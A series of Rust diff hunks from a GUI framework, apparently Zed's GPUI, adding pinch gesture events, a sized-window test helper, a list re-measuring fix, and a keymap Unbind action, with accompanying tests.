pub background_executor: BackgroundExecutor,
#[doc(hidden)]
pub foreground_executor: ForegroundExecutor,
- dispatcher: TestDispatcher,
+ #[doc(hidden)]
+ pub dispatcher: TestDispatcher,
test_platform: Rc<TestPlatform>,
text_system: Arc<TextSystem>,
fn_name: Option<&'static str>,
@@ -231,6 +232,33 @@ impl TestAppContext {
.unwrap()
}
+ /// Opens a new window with a specific size.
+ ///
+ /// Unlike `add_window` which uses maximized bounds, this allows controlling
+ /// the window dimensions, which is important for layout-sensitive tests.
+ pub fn open_window<F, V>(
+ &mut self,
+ window_size: Size<Pixels>,
+ build_window: F,
+ ) -> WindowHandle<V>
+ where
+ F: FnOnce(&mut Window, &mut Context<V>) -> V,
+ V: 'static + Render,
+ {
+ let mut cx = self.app.borrow_mut();
+ cx.open_window(
+ WindowOptions {
+ window_bounds: Some(WindowBounds::Windowed(Bounds {
+ origin: Point::default(),
+ size: window_size,
+ })),
+ ..Default::default()
+ },
+ |window, cx| cx.new(|cx| build_window(window, cx)),
+ )
+ .unwrap()
+ }
+
/// Adds a new window with no content.
pub fn add_empty_window(&mut self) -> &mut VisualTestContext {
let mut cx = self.app.borrow_mut();
@@ -820,6 +820,15 @@ impl LinearColorStop {
}
impl Background {
+ /// Returns the solid color if this is a solid background, None otherwise.
+ pub fn as_solid(&self) -> Option<Hsla> {
+ if self.tag == BackgroundTag::Solid {
+ Some(self.solid)
+ } else {
+ None
+ }
+ }
+
/// Use specified color space for color interpolation.
///
/// <https://developer.mozilla.org/en-US/docs/Web/CSS/color-interpolation-method>
@@ -15,6 +15,8 @@
//! and Tailwind-like styling that you can use to build your own custom elements. Div is
//! constructed by combining these two systems into an all-in-one element.
+#[cfg(any(target_os = "linux", target_os = "macos"))]
+use crate::PinchEvent;
use crate::{
AbsoluteLength, Action, AnyDrag, AnyElement, AnyTooltip, AnyView, App, Bounds, ClickEvent,
DispatchPhase, Display, Element, ElementId, Entity, FocusHandle, Global, GlobalElementId,
@@ -353,6 +355,43 @@ impl Interactivity {
}));
}
+ /// Bind the given callback to pinch gesture events during the bubble phase.
+ ///
+ /// Note: This event is only available on macOS and Wayland (Linux).
+ /// On Windows, pinch gestures are simulated as scroll wheel events with Ctrl held.
+ ///
+ /// See [`Context::listener`](crate::Context::listener) to get access to a view's state from this callback.
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ pub fn on_pinch(&mut self, listener: impl Fn(&PinchEvent, &mut Window, &mut App) + 'static) {
+ self.pinch_listeners
+ .push(Box::new(move |event, phase, hitbox, window, cx| {
+ if phase == DispatchPhase::Bubble && hitbox.is_hovered(window) {
+ (listener)(event, window, cx);
+ }
+ }));
+ }
+
+ /// Bind the given callback to pinch gesture events during the capture phase.
+ ///
+ /// Note: This event is only available on macOS and Wayland (Linux).
+ /// On Windows, pinch gestures are simulated as scroll wheel events with Ctrl held.
+ ///
+ /// See [`Context::listener`](crate::Context::listener) to get access to a view's state from this callback.
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ pub fn capture_pinch(
+ &mut self,
+ listener: impl Fn(&PinchEvent, &mut Window, &mut App) + 'static,
+ ) {
+ self.pinch_listeners
+ .push(Box::new(move |event, phase, _hitbox, window, cx| {
+ if phase == DispatchPhase::Capture {
+ (listener)(event, window, cx);
+ } else {
+ cx.propagate();
+ }
+ }));
+ }
+
/// Bind the given callback to an action dispatch during the capture phase.
/// The imperative API equivalent to [`InteractiveElement::capture_action`].
///
@@ -635,6 +674,16 @@ impl Interactivity {
pub fn block_mouse_except_scroll(&mut self) {
self.hitbox_behavior = HitboxBehavior::BlockMouseExceptScroll;
}
+
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ fn has_pinch_listeners(&self) -> bool {
+ !self.pinch_listeners.is_empty()
+ }
+
+ #[cfg(not(any(target_os = "linux", target_os = "macos")))]
+ fn has_pinch_listeners(&self) -> bool {
+ false
+ }
}
/// A trait for elements that want to use the standard GPUI event handlers that don't
@@ -905,6 +954,34 @@ pub trait InteractiveElement: Sized {
self
}
+ /// Bind the given callback to pinch gesture events during the bubble phase.
+ /// The fluent API equivalent to [`Interactivity::on_pinch`].
+ ///
+ /// Note: This event is only available on macOS and Wayland (Linux).
+ /// On Windows, pinch gestures are simulated as scroll wheel events with Ctrl held.
+ ///
+ /// See [`Context::listener`](crate::Context::listener) to get access to a view's state from this callback.
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ fn on_pinch(mut self, listener: impl Fn(&PinchEvent, &mut Window, &mut App) + 'static) -> Self {
+ self.interactivity().on_pinch(listener);
+ self
+ }
+
+ /// Bind the given callback to pinch gesture events during the capture phase.
+ /// The fluent API equivalent to [`Interactivity::capture_pinch`].
+ ///
+ /// Note: This event is only available on macOS and Wayland (Linux).
+ /// On Windows, pinch gestures are simulated as scroll wheel events with Ctrl held.
+ ///
+ /// See [`Context::listener`](crate::Context::listener) to get access to a view's state from this callback.
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ fn capture_pinch(
+ mut self,
+ listener: impl Fn(&PinchEvent, &mut Window, &mut App) + 'static,
+ ) -> Self {
+ self.interactivity().capture_pinch(listener);
+ self
+ }
/// Capture the given action, before normal action dispatch can fire.
/// The fluent API equivalent to [`Interactivity::capture_action`].
///
@@ -1290,6 +1367,10 @@ pub(crate) type MouseMoveListener =
pub(crate) type ScrollWheelListener =
Box<dyn Fn(&ScrollWheelEvent, DispatchPhase, &Hitbox, &mut Window, &mut App) + 'static>;
+#[cfg(any(target_os = "linux", target_os = "macos"))]
+pub(crate) type PinchListener =
+ Box<dyn Fn(&PinchEvent, DispatchPhase, &Hitbox, &mut Window, &mut App) + 'static>;
+
pub(crate) type ClickListener = Rc<dyn Fn(&ClickEvent, &mut Window, &mut App) + 'static>;
pub(crate) type DragListener =
@@ -1644,6 +1725,8 @@ pub struct Interactivity {
pub(crate) mouse_pressure_listeners: Vec<MousePressureListener>,
pub(crate) mouse_move_listeners: Vec<MouseMoveListener>,
pub(crate) scroll_wheel_listeners: Vec<ScrollWheelListener>,
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ pub(crate) pinch_listeners: Vec<PinchListener>,
pub(crate) key_down_listeners: Vec<KeyDownListener>,
pub(crate) key_up_listeners: Vec<KeyUpListener>,
pub(crate) modifiers_changed_listeners: Vec<ModifiersChangedListener>,
@@ -1847,6 +1930,7 @@ impl Interactivity {
|| !self.click_listeners.is_empty()
|| !self.aux_click_listeners.is_empty()
|| !self.scroll_wheel_listeners.is_empty()
+ || self.has_pinch_listeners()
|| self.drag_listener.is_some()
|| !self.drop_listeners.is_empty()
|| self.tooltip_builder.is_some()
@@ -2213,6 +2297,14 @@ impl Interactivity {
})
}
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ for listener in self.pinch_listeners.drain(..) {
+ let hitbox = hitbox.clone();
+ window.on_mouse_event(move |event: &PinchEvent, phase, window, cx| {
+ listener(event, phase, &hitbox, window, cx);
+ })
+ }
+
if self.hover_style.is_some()
|| self.base_style.mouse_cursor.is_some()
|| cx.active_drag.is_some() && !self.drag_over_styles.is_empty()
@@ -2497,7 +2589,8 @@ impl Interactivity {
let pending_mouse_down = pending_mouse_down.clone();
let source_bounds = hitbox.bounds;
move |window: &Window| {
- pending_mouse_down.borrow().is_none()
+ !window.last_input_was_keyboard()
+ && pending_mouse_down.borrow().is_none()
&& source_bounds.contains(&window.mouse_position())
}
});
@@ -1103,6 +1103,7 @@ impl Element for List {
);
state.items = new_items;
+ state.measuring_behavior.reset();
}
let padding = style
@@ -1348,6 +1349,41 @@ mod test {
assert_eq!(offset.offset_in_item, px(0.));
}
+ #[gpui::test]
+ fn test_measure_all_after_width_change(cx: &mut TestAppContext) {
+ let cx = cx.add_empty_window();
+
+ let state = ListState::new(10, crate::ListAlignment::Top, px(0.)).measure_all();
+
+ struct TestView(ListState);
+ impl Render for TestView {
+ fn render(&mut self, _: &mut Window, _: &mut Context<Self>) -> impl IntoElement {
+ list(self.0.clone(), |_, _, _| {
+ div().h(px(50.)).w_full().into_any()
+ })
+ .w_full()
+ .h_full()
+ }
+ }
+
+ let view = cx.update(|_, cx| cx.new(|_| TestView(state.clone())));
+
+ // First draw at width 100: all 10 items measured (total 500px).
+ // Viewport is 200px, so max scroll offset should be 300px.
+ cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| {
+ view.clone().into_any_element()
+ });
+ assert_eq!(state.max_offset_for_scrollbar().y, px(300.));
+
+ // Second draw at a different width: items get invalidated.
+ // Without the fix, max_offset would drop because unmeasured items
+ // contribute 0 height.
+ cx.draw(point(px(0.), px(0.)), size(px(200.), px(200.)), |_, _| {
+ view.into_any_element()
+ });
+ assert_eq!(state.max_offset_for_scrollbar().y, px(300.));
+ }
+
#[gpui::test]
fn test_remeasure(cx: &mut TestAppContext) {
let cx = cx.add_empty_window();
@@ -129,6 +129,13 @@ impl BackgroundExecutor {
}
}
+ /// Returns the underlying scheduler::BackgroundExecutor.
+ ///
+ /// This is used by Ex to pass the executor to thread/worktree code.
+ pub fn scheduler_executor(&self) -> scheduler::BackgroundExecutor {
+ self.inner.clone()
+ }
+
/// Enqueues the given future to be run to completion on a background thread.
#[track_caller]
pub fn spawn<R>(&self, future: impl Future<Output = R> + Send + 'static) -> Task<R>
@@ -17,6 +17,9 @@ pub trait KeyEvent: InputEvent {}
/// A mouse event from the platform.
pub trait MouseEvent: InputEvent {}
+/// A gesture event from the platform.
+pub trait GestureEvent: InputEvent {}
+
/// The key down event equivalent for the platform.
#[derive(Clone, Debug, Eq, PartialEq)]
pub struct KeyDownEvent {
@@ -467,6 +470,51 @@ impl Default for ScrollDelta {
}
}
+/// A pinch gesture event from the platform, generated when the user performs
+/// a pinch-to-zoom gesture (typically on a trackpad).
+///
+/// Note: This event is only available on macOS and Wayland (Linux).
+/// On Windows, pinch gestures are simulated as scroll wheel events with Ctrl held.
+#[derive(Clone, Debug, Default)]
+#[cfg(any(target_os = "linux", target_os = "macos"))]
+pub struct PinchEvent {
+ /// The position of the pinch center on the window.
+ pub position: Point<Pixels>,
+
+ /// The zoom delta for this event.
+ /// Positive values indicate zooming in, negative values indicate zooming out.
+ /// For example, 0.1 represents a 10% zoom increase.
+ pub delta: f32,
+
+ /// The modifiers that were held down during the pinch gesture.
+ pub modifiers: Modifiers,
+
+ /// The phase of the pinch gesture.
+ pub phase: TouchPhase,
+}
+
+#[cfg(any(target_os = "linux", target_os = "macos"))]
+impl Sealed for PinchEvent {}
+#[cfg(any(target_os = "linux", target_os = "macos"))]
+impl InputEvent for PinchEvent {
+ fn to_platform_input(self) -> PlatformInput {
+ PlatformInput::Pinch(self)
+ }
+}
+#[cfg(any(target_os = "linux", target_os = "macos"))]
+impl GestureEvent for PinchEvent {}
+#[cfg(any(target_os = "linux", target_os = "macos"))]
+impl MouseEvent for PinchEvent {}
+
+#[cfg(any(target_os = "linux", target_os = "macos"))]
+impl Deref for PinchEvent {
+ type Target = Modifiers;
+
+ fn deref(&self) -> &Self::Target {
+ &self.modifiers
+ }
+}
+
impl ScrollDelta {
/// Returns true if this is a precise scroll delta in pixels.
pub fn precise(&self) -> bool {
@@ -626,6 +674,9 @@ pub enum PlatformInput {
MouseExited(MouseExitEvent),
/// The scroll wheel was used.
ScrollWheel(ScrollWheelEvent),
+ /// A pinch gesture was performed.
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ Pinch(PinchEvent),
/// Files were dragged and dropped onto the window.
FileDrop(FileDropEvent),
}
@@ -642,6 +693,8 @@ impl PlatformInput {
PlatformInput::MousePressure(event) => Some(event),
PlatformInput::MouseExited(event) => Some(event),
PlatformInput::ScrollWheel(event) => Some(event),
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ PlatformInput::Pinch(event) => Some(event),
PlatformInput::FileDrop(event) => Some(event),
}
}
@@ -657,6 +710,8 @@ impl PlatformInput {
PlatformInput::MousePressure(_) => None,
PlatformInput::MouseExited(_) => None,
PlatformInput::ScrollWheel(_) => None,
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ PlatformInput::Pinch(_) => None,
PlatformInput::FileDrop(_) => None,
}
}
@@ -629,66 +629,99 @@ mod tests {
use std::{cell::RefCell, ops::Range, rc::Rc};
use crate::{
- Action, ActionRegistry, App, Bounds, Context, DispatchTree, FocusHandle, InputHandler,
- IntoElement, KeyBinding, KeyContext, Keymap, Pixels, Point, Render, Subscription,
- TestAppContext, UTF16Selection, Window,
+ ActionRegistry, App, Bounds, Context, DispatchTree, FocusHandle, InputHandler, IntoElement,
+ KeyBinding, KeyContext, Keymap, Pixels, Point, Render, Subscription, TestAppContext,
+ UTF16Selection, Unbind, Window,
};
- #[derive(PartialEq, Eq)]
- struct TestAction;
+ actions!(dispatch_test, [TestAction, SecondaryTestAction]);
- impl Action for TestAction {
- fn name(&self) -> &'static str {
- "test::TestAction"
- }
-
- fn name_for_type() -> &'static str
- where
- Self: ::std::marker::Sized,
- {
- "test::TestAction"
- }
-
- fn partial_eq(&self, action: &dyn Action) -> bool {
- action.as_any().downcast_ref::<Self>() == Some(self)
- }
-
- fn boxed_clone(&self) -> std::boxed::Box<dyn Action> {
- Box::new(TestAction)
- }
+ fn test_dispatch_tree(bindings: Vec<KeyBinding>) -> DispatchTree {
+ let registry = ActionRegistry::default();
- fn build(_value: serde_json::Value) -> anyhow::Result<Box<dyn Action>>
- where
- Self: Sized,
- {
- Ok(Box::new(TestAction))
- }
+ DispatchTree::new(
+ Rc::new(RefCell::new(Keymap::new(bindings))),
+ Rc::new(registry),
+ )
}
#[test]
fn test_keybinding_for_action_bounds() {
- let keymap = Keymap::new(vec![KeyBinding::new(
+ let tree = test_dispatch_tree(vec![KeyBinding::new(
"cmd-n",
TestAction,
Some("ProjectPanel"),
)]);
- let mut registry = ActionRegistry::default();
+ let contexts = vec![
+ KeyContext::parse("Workspace").unwrap(),
+ KeyContext::parse("ProjectPanel").unwrap(),
+ ];
+
+ let keybinding = tree.bindings_for_action(&TestAction, &contexts);
+
+ assert!(keybinding[0].action.partial_eq(&TestAction))
+ }
+
+ #[test]
+ fn test_bindings_for_action_hides_targeted_unbind_in_active_context() {
+ let tree = test_dispatch_tree(vec![
+ KeyBinding::new("tab", TestAction, Some("Editor")),
+ KeyBinding::new(
+ "tab",
+ Unbind("dispatch_test::TestAction".into()),
+ Some("Editor && edit_prediction"),
+ ),
+ KeyBinding::new(
+ "tab",
+ SecondaryTestAction,
+ Some("Editor && showing_completions"),
+ ),
+ ]);
+
+ let contexts = vec![
+ KeyContext::parse("Workspace").unwrap(),
+ KeyContext::parse("Editor showing_completions edit_prediction").unwrap(),
+ ];
- registry.load_action::<TestAction>();
+ let bindings = tree.bindings_for_action(&TestAction, &contexts);
+ assert!(bindings.is_empty());
- let keymap = Rc::new(RefCell::new(keymap));
+ let highest = tree.highest_precedence_binding_for_action(&TestAction, &contexts);
+ assert!(highest.is_none());
+
+ let fallback_bindings = tree.bindings_for_action(&SecondaryTestAction, &contexts);
+ assert_eq!(fallback_bindings.len(), 1);
+ assert!(fallback_bindings[0].action.partial_eq(&SecondaryTestAction));
+ }
- let tree = DispatchTree::new(keymap, Rc::new(registry));
+ #[test]
+ fn test_bindings_for_action_keeps_targeted_binding_outside_unbind_context() {
+ let tree = test_dispatch_tree(vec![
+ KeyBinding::new("tab", TestAction, Some("Editor")),
+ KeyBinding::new(
+ "tab",
+ Unbind("dispatch_test::TestAction".into()),
+ Some("Editor && edit_prediction"),
+ ),
+ KeyBinding::new(
+ "tab",
+ SecondaryTestAction,
+ Some("Editor && showing_completions"),
+ ),
+ ]);
let contexts = vec![
KeyContext::parse("Workspace").unwrap(),
- KeyContext::parse("ProjectPanel").unwrap(),
+ KeyContext::parse("Editor").unwrap(),
];
- let keybinding = tree.bindings_for_action(&TestAction, &contexts);
+ let bindings = tree.bindings_for_action(&TestAction, &contexts);
+ assert_eq!(bindings.len(), 1);
+ assert!(bindings[0].action.partial_eq(&TestAction));
- assert!(keybinding[0].action.partial_eq(&TestAction))
+ let highest = tree.highest_precedence_binding_for_action(&TestAction, &contexts);
+ assert!(highest.is_some_and(|binding| binding.action.partial_eq(&TestAction)));
}
#[test]
@@ -698,10 +731,7 @@ mod tests {
KeyBinding::new("space", TestAction, Some("ContextA")),
KeyBinding::new("space f g", TestAction, Some("ContextB")),
];
- let keymap = Rc::new(RefCell::new(Keymap::new(bindings)));
- let mut registry = ActionRegistry::default();
- registry.load_action::<TestAction>();
- let mut tree = DispatchTree::new(keymap, Rc::new(registry));
+ let mut tree = test_dispatch_tree(bindings);
type DispatchPath = SmallVec<[super::DispatchNodeId; 32]>;
fn dispatch(
@@ -4,7 +4,7 @@ mod context;
pub use binding::*;
pub use context::*;
-use crate::{Action, AsKeystroke, Keystroke, is_no_action};
+use crate::{Action, AsKeystroke, Keystroke, Unbind, is_no_action, is_unbind};
use collections::{HashMap, HashSet};
use smallvec::SmallVec;
use std::any::TypeId;
@@ -19,7 +19,7 @@ pub struct KeymapVersion(usize);
pub struct Keymap {
bindings: Vec<KeyBinding>,
binding_indices_by_action_id: HashMap<TypeId, SmallVec<[usize; 3]>>,
- no_action_binding_indices: Vec<usize>,
+ disabled_binding_indices: Vec<usize>,
version: KeymapVersion,
}
@@ -27,6 +27,26 @@ pub struct Keymap {
#[derive(Copy, Clone, Debug, Eq, PartialEq, Ord, PartialOrd)]
pub struct BindingIndex(usize);
+fn disabled_binding_matches_context(disabled_binding: &KeyBinding, binding: &KeyBinding) -> bool {
+ match (
+ &disabled_binding.context_predicate,
+ &binding.context_predicate,
+ ) {
+ (None, _) => true,
+ (Some(_), None) => false,
+ (Some(disabled_predicate), Some(predicate)) => disabled_predicate.is_superset(predicate),
+ }
+}
+
+fn binding_is_unbound(disabled_binding: &KeyBinding, binding: &KeyBinding) -> bool {
+ disabled_binding.keystrokes == binding.keystrokes
+ && disabled_binding
+ .action()
+ .as_any()
+ .downcast_ref::<Unbind>()
+ .is_some_and(|unbind| unbind.0.as_ref() == binding.action.name())
+}
+
impl Keymap {
/// Create a new keymap with the given bindings.
pub fn new(bindings: Vec<KeyBinding>) -> Self {
@@ -44,8 +64,8 @@ impl Keymap {
pub fn add_bindings<T: IntoIterator<Item = KeyBinding>>(&mut self, bindings: T) {
for binding in bindings {
let action_id = binding.action().as_any().type_id();
- if is_no_action(&*binding.action) {
- self.no_action_binding_indices.push(self.bindings.len());
+ if is_no_action(&*binding.action) || is_unbind(&*binding.action) {
+ self.disabled_binding_indices.push(self.bindings.len());
} else {
self.binding_indices_by_action_id
.entry(action_id)
@@ -62,7 +82,7 @@ impl Keymap {
pub fn clear(&mut self) {
self.bindings.clear();
self.binding_indices_by_action_id.clear();
- self.no_action_binding_indices.clear();
+ self.disabled_binding_indices.clear();
self.version.0 += 1;
}
@@ -90,21 +110,22 @@ impl Keymap {
return None;
}
- for null_ix in &self.no_action_binding_indices {
- if null_ix > ix {
- let null_binding = &self.bindings[*null_ix];
- if null_binding.keystrokes == binding.keystrokes {
- let null_binding_matches =
- match (&null_binding.context_predicate, &binding.context_predicate) {
- (None, _) => true,
- (Some(_), None) => false,
- (Some(null_predicate), Some(predicate)) => {
- null_predicate.is_superset(predicate)
- }
- };
- if null_binding_matches {
+ for disabled_ix in &self.disabled_binding_indices {
+ if disabled_ix > ix {
+ let disabled_binding = &self.bindings[*disabled_ix];
+ if disabled_binding.keystrokes != binding.keystrokes {
+ continue;
+ }
+
+ if is_no_action(&*disabled_binding.action) {
+ if disabled_binding_matches_context(disabled_binding, binding) {
return None;
}
+ } else if is_unbind(&*disabled_binding.action)
+ && disabled_binding_matches_context(disabled_binding, binding)
+ && binding_is_unbound(disabled_binding, binding)
+ {
+ return None;
}
}
}
@@ -170,6 +191,7 @@ impl Keymap {
let mut bindings: SmallVec<[_; 1]> = SmallVec::new();
let mut first_binding_index = None;
+ let mut unbound_bindings: Vec<&KeyBinding> = Vec::new();
for (_, ix, binding) in matched_bindings {
if is_no_action(&*binding.action) {
@@ -186,6 +208,19 @@ impl Keymap {
// For non-user NoAction bindings, continue searching for user overrides
continue;
}
+
+ if is_unbind(&*binding.action) {
+ unbound_bindings.push(binding);
+ continue;
+ }
+
+ if unbound_bindings
+ .iter()
+ .any(|disabled_binding| binding_is_unbound(disabled_binding, binding))
+ {
+ continue;
+ }
+
bindings.push(binding.clone());
first_binding_index.get_or_insert(ix);
}
@@ -197,7 +232,7 @@ impl Keymap {
{
continue;
}
- if is_no_action(&*binding.action) {
+ if is_no_action(&*binding.action) || is_unbind(&*binding.action) {
pending.remove(&&binding.keystrokes);
continue;
}
@@ -232,7 +267,10 @@ impl Keymap {
match pending {
None => None,
Some(is_pending) => {
- if !is_pending || is_no_action(&*binding.action) {
+ if !is_pending
+ || is_no_action(&*binding.action)
+ || is_unbind(&*binding.action)
+ {
return None;
}
Some((depth, BindingIndex(ix), binding))
@@ -256,7 +294,7 @@ impl Keymap {
mod tests {
use super::*;
use crate as gpui;
- use gpui::NoAction;
+ use gpui::{NoAction, Unbind};
actions!(
test_only,
@@ -720,6 +758,76 @@ mod tests {
}
}
+ #[test]
+ fn test_targeted_unbind_ignores_target_context() {
+ let bindings = [
+ KeyBinding::new("tab", ActionAlpha {}, Some("Editor")),
+ KeyBinding::new("tab", ActionBeta {}, Some("Editor && showing_completions")),
+ KeyBinding::new(
+ "tab",
+ Unbind("test_only::ActionAlpha".into()),
+ Some("Editor && edit_prediction"),
+ ),
+ ];
+
+ let mut keymap = Keymap::default();
+ keymap.add_bindings(bindings);
+
+ let (result, pending) = keymap.bindings_for_input(
+ &[Keystroke::parse("tab").unwrap()],
+ &[KeyContext::parse("Editor showing_completions edit_prediction").unwrap()],
+ );
+
+ assert!(!pending);
+ assert_eq!(result.len(), 1);
+ assert!(result[0].action.partial_eq(&ActionBeta {}));
+ }
+
+ #[test]
+ fn test_bindings_for_action_keeps_binding_for_narrower_targeted_unbind() {
+ let bindings = [
+ KeyBinding::new("tab", ActionAlpha {}, Some("Editor")),
+ KeyBinding::new(
+ "tab",
+ Unbind("test_only::ActionAlpha".into()),
+ Some("Editor && edit_prediction"),
+ ),
+ KeyBinding::new("tab", ActionBeta {}, Some("Editor && showing_completions")),
+ ];
+
+ let mut keymap = Keymap::default();
+ keymap.add_bindings(bindings);
+
+ assert_bindings(&keymap, &ActionAlpha {}, &["tab"]);
+ assert_bindings(&keymap, &ActionBeta {}, &["tab"]);
+
+ #[track_caller]
+ fn assert_bindings(keymap: &Keymap, action: &dyn Action, expected: &[&str]) {
+ let actual = keymap
+ .bindings_for_action(action)
+ .map(|binding| binding.keystrokes[0].inner().unparse())
+ .collect::<Vec<_>>();
+ assert_eq!(actual, expected, "{:?}", action);
+ }
+ }
+
+ #[test]
+ fn test_bindings_for_action_removes_binding_for_broader_targeted_unbind() {
+ let bindings = [
+ KeyBinding::new("tab", ActionAlpha {}, Some("Editor && edit_prediction")),
+ KeyBinding::new(
+ "tab",
+ Unbind("test_only::ActionAlpha".into()),
+ Some("Editor"),
+ ),
+ ];
+
+ let mut keymap = Keymap::default();
+ keymap.add_bindings(bindings);
+
+ assert!(keymap.bindings_for_action(&ActionAlpha {}).next().is_none());
+ }
+
#[test]
fn test_source_precedence_sorting() {
// KeybindSource precedence: User (0) > Vim (1) > Base (2) > Default (3)
@@ -199,13 +199,20 @@ pub enum KeyBindingContextPredicate {
impl fmt::Display for KeyBindingContextPredicate {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
match self {
- Self::Identifier(name) => write!(f, "{}", name),
- Self::Equal(left, right) => write!(f, "{} == {}", left, right),
- Self::NotEqual(left, right) => write!(f, "{} != {}", left, right),
- Self::Not(pred) => write!(f, "!{}", pred),
- Self::Descendant(parent, child) => write!(f, "{} > {}", parent, child),
- Self::And(left, right) => write!(f, "({} && {})", left, right),
- Self::Or(left, right) => write!(f, "({} || {})", left, right),
+ Self::Identifier(name) => write!(f, "{name}"),
+ Self::Equal(left, right) => write!(f, "{left} == {right}"),
+ Self::NotEqual(left, right) => write!(f, "{left} != {right}"),
+ Self::Descendant(parent, child) => write!(f, "{parent} > {child}"),
+ Self::Not(pred) => match pred.as_ref() {
+ Self::Identifier(name) => write!(f, "!{name}"),
+ _ => write!(f, "!({pred})"),
+ },
+ Self::And(..) => self.fmt_joined(f, " && ", LogicalOperator::And, |node| {
+ matches!(node, Self::Or(..))
+ }),
+ Self::Or(..) => self.fmt_joined(f, " || ", LogicalOperator::Or, |node| {
+ matches!(node, Self::And(..))
+ }),
}
}
}
@@ -436,6 +443,52 @@ impl KeyBindingContextPredicate {
anyhow::bail!("operands of != must be identifiers");
}
}
+
+ fn fmt_joined(
+ &self,
+ f: &mut fmt::Formatter<'_>,
+ separator: &str,
+ operator: LogicalOperator,
+ needs_parens: impl Fn(&Self) -> bool + Copy,
+ ) -> fmt::Result {
+ let mut first = true;
+ self.fmt_joined_inner(f, separator, operator, needs_parens, &mut first)
+ }
+
+ fn fmt_joined_inner(
+ &self,
+ f: &mut fmt::Formatter<'_>,
+ separator: &str,
+ operator: LogicalOperator,
+ needs_parens: impl Fn(&Self) -> bool + Copy,
+ first: &mut bool,
+ ) -> fmt::Result {
+ match (operator, self) {
+ (LogicalOperator::And, Self::And(left, right))
+ | (LogicalOperator::Or, Self::Or(left, right)) => {
+ left.fmt_joined_inner(f, separator, operator, needs_parens, first)?;
+ right.fmt_joined_inner(f, separator, operator, needs_parens, first)
+ }
+ (_, node) => {
+ if !*first {
+ f.write_str(separator)?;
+ }
+ *first = false;
+
+ if needs_parens(node) {
+ write!(f, "({node})")
+ } else {
+ write!(f, "{node}")
+ }
+ }
+ }
+ }
+}
+
+#[derive(Clone, Copy)]
+enum LogicalOperator {
+ And,
+ Or,
}
const PRECEDENCE_CHILD: u32 = 1;
@@ -757,4 +810,82 @@ mod tests {
assert!(not_workspace.eval(slice::from_ref(&editor_context)));
assert!(!not_workspace.eval(&workspace_pane_editor));
}
+
+ // MARK: - Display
+
+ #[test]
+ fn test_context_display() {
+ fn ident(s: &str) -> Box<KeyBindingContextPredicate> {
+ Box::new(Identifier(SharedString::new(s)))
+ }
+ fn eq(a: &str, b: &str) -> Box<KeyBindingContextPredicate> {
+ Box::new(Equal(SharedString::new(a), SharedString::new(b)))
+ }
+ fn not_eq(a: &str, b: &str) -> Box<KeyBindingContextPredicate> {
+ Box::new(NotEqual(SharedString::new(a), SharedString::new(b)))
+ }
+ fn and(
+ a: Box<KeyBindingContextPredicate>,
+ b: Box<KeyBindingContextPredicate>,
+ ) -> Box<KeyBindingContextPredicate> {
+ Box::new(And(a, b))
+ }
+ fn or(
+ a: Box<KeyBindingContextPredicate>,
+ b: Box<KeyBindingContextPredicate>,
+ ) -> Box<KeyBindingContextPredicate> {
+ Box::new(Or(a, b))
+ }
+ fn descendant(
+ a: Box<KeyBindingContextPredicate>,
+ b: Box<KeyBindingContextPredicate>,
+ ) -> Box<KeyBindingContextPredicate> {
+ Box::new(Descendant(a, b))
+ }
+ fn not(a: Box<KeyBindingContextPredicate>) -> Box<KeyBindingContextPredicate> {
+ Box::new(Not(a))
+ }
+
+ let test_cases = [
+ (ident("a"), "a"),
+ (eq("a", "b"), "a == b"),
+ (not_eq("a", "b"), "a != b"),
+ (descendant(ident("a"), ident("b")), "a > b"),
+ (not(ident("a")), "!a"),
+ (not_eq("a", "b"), "a != b"),
+ (descendant(ident("a"), ident("b")), "a > b"),
+ (not(and(ident("a"), ident("b"))), "!(a && b)"),
+ (not(or(ident("a"), ident("b"))), "!(a || b)"),
+ (and(ident("a"), ident("b")), "a && b"),
+ (and(and(ident("a"), ident("b")), ident("c")), "a && b && c"),
+ (or(ident("a"), ident("b")), "a || b"),
+ (or(or(ident("a"), ident("b")), ident("c")), "a || b || c"),
+ (or(ident("a"), and(ident("b"), ident("c"))), "a || (b && c)"),
+ (
+ and(
+ and(
+ and(ident("a"), eq("b", "c")),
+ not(descendant(ident("d"), ident("e"))),
+ ),
+ eq("f", "g"),
+ ),
+ "a && b == c && !(d > e) && f == g",
+ ),
+ (
+ and(and(ident("a"), or(ident("b"), ident("c"))), ident("d")),
+ "a && (b || c) && d",
+ ),
+ (
+ or(or(ident("a"), and(ident("b"), ident("c"))), ident("d")),
+ "a || (b && c) || d",
+ ),
+ ];
+
+ for (predicate, expected) in test_cases {
+ let actual = predicate.to_string();
+ assert_eq!(actual, expected);
+ let parsed = KeyBindingContextPredicate::parse(&actual).unwrap();
+ assert_eq!(parsed, *predicate);
+ }
+ }
}
@@ -37,6 +37,8 @@ use crate::{
ThreadTaskTimings, Window, WindowControlArea, hash, point, px, size,
};
use anyhow::Result;
+#[cfg(any(target_os = "linux", target_os = "freebsd"))]
+use anyhow::bail;
use async_task::Runnable;
use futures::channel::oneshot;
#[cfg(any(test, feature = "test-support"))]
@@ -78,6 +80,7 @@ pub use test::{TestDispatcher, TestScreenCaptureSource, TestScreenCaptureStream}
#[cfg(all(target_os = "macos", any(test, feature = "test-support")))]
pub use visual_test::VisualTestPlatform;
+// TODO(jk): return an enum instead of a string
/// Return which compositor we're guessing we'll use.
/// Does not attempt to connect to the given compositor.
#[cfg(any(target_os = "linux", target_os = "freebsd"))]
@@ -155,6 +158,11 @@ pub trait Platform: 'static {
/// Returns the appearance of the application's windows.
fn window_appearance(&self) -> WindowAppearance;
+ /// Returns the window button layout configuration when supported.
+ fn button_layout(&self) -> Option<WindowButtonLayout> {
+ None
+ }
+
fn open_url(&self, url: &str);
fn on_open_urls(&self, callback: Box<dyn FnMut(Vec<String>)>);
fn register_url_scheme(&self, url: &str) -> Task<Result<()>>;
@@ -406,6 +414,145 @@ impl Default for WindowControls {
}
}
